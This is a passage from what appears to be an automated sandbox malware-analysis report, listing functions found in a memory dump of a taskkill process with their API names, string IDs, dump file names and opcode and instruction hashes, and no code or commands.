                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3c96866a5221c1a97ddd32c6f3335cde147648012d85a78e8c50bcdb73353505
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C2411031705206ABEB20DE25CC41B76B7A6FB85714F200698F955AB250EB20F952ABD0
                                                                                                                                                                                                                                      Function 04C52300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ___swprintf_l
                                                                                                                                                                                                                                      • String ID: %%%u$]:%u
                                                                                                                                                                                                                                      • API String ID: 48624451-3050659472
                                                                                                                                                                                                                                      • Opcode ID: 179f11643f894699818d62e88d6eff8720f771bd36b4647fdfa3de15a0330ca5
                                                                                                                                                                                                                                      • Instruction ID: 80e15a0397d4bb37a8a35d1da09d2f936d3060ceb388a884885969c38dbd2c33
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 179f11643f894699818d62e88d6eff8720f771bd36b4647fdfa3de15a0330ca5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7E318472A002199FDB20DE29CC40BEE77FDEB44614F4405D5ED49E3210EB30BA889FA1
                                                                                                                                                                                                                                      Function 04BE7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: __aulldvrm
                                                                                                                                                                                                                                      • String ID: +$-
                                                                                                                                                                                                                                      • API String ID: 1302938615-2137968064
                                                                                                                                                                                                                                      • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                                                                                                                                      • Instruction ID: e314d398f0abbc012fe97fe494a969d479ece6c69fdc74852ddce38826ab053c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C919670E002569BDF24DE6BC891ABEB7A5FFC4720F14459AE855E72C0EF34E94097A0
                                                                                                                                                                                                                                      Function 04BA9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: $$@
                                                                                                                                                                                                                                      • API String ID: 0-1194432280
                                                                                                                                                                                                                                      • Opcode ID: 8bb6187e91278a39b575f6e9cb04a23528cbed35932d44f4c22bb524056ff08a
                                                                                                                                                                                                                                      • Instruction ID: ecbe2c7036d78717ef22d04e50bb131a968ecb7a13659241160e4530a5027ac0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8bb6187e91278a39b575f6e9cb04a23528cbed35932d44f4c22bb524056ff08a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C7812FB5D002699BDB31CF54CC48BEEB7B4AB48754F0045DAE919B7280D770AE94DFA0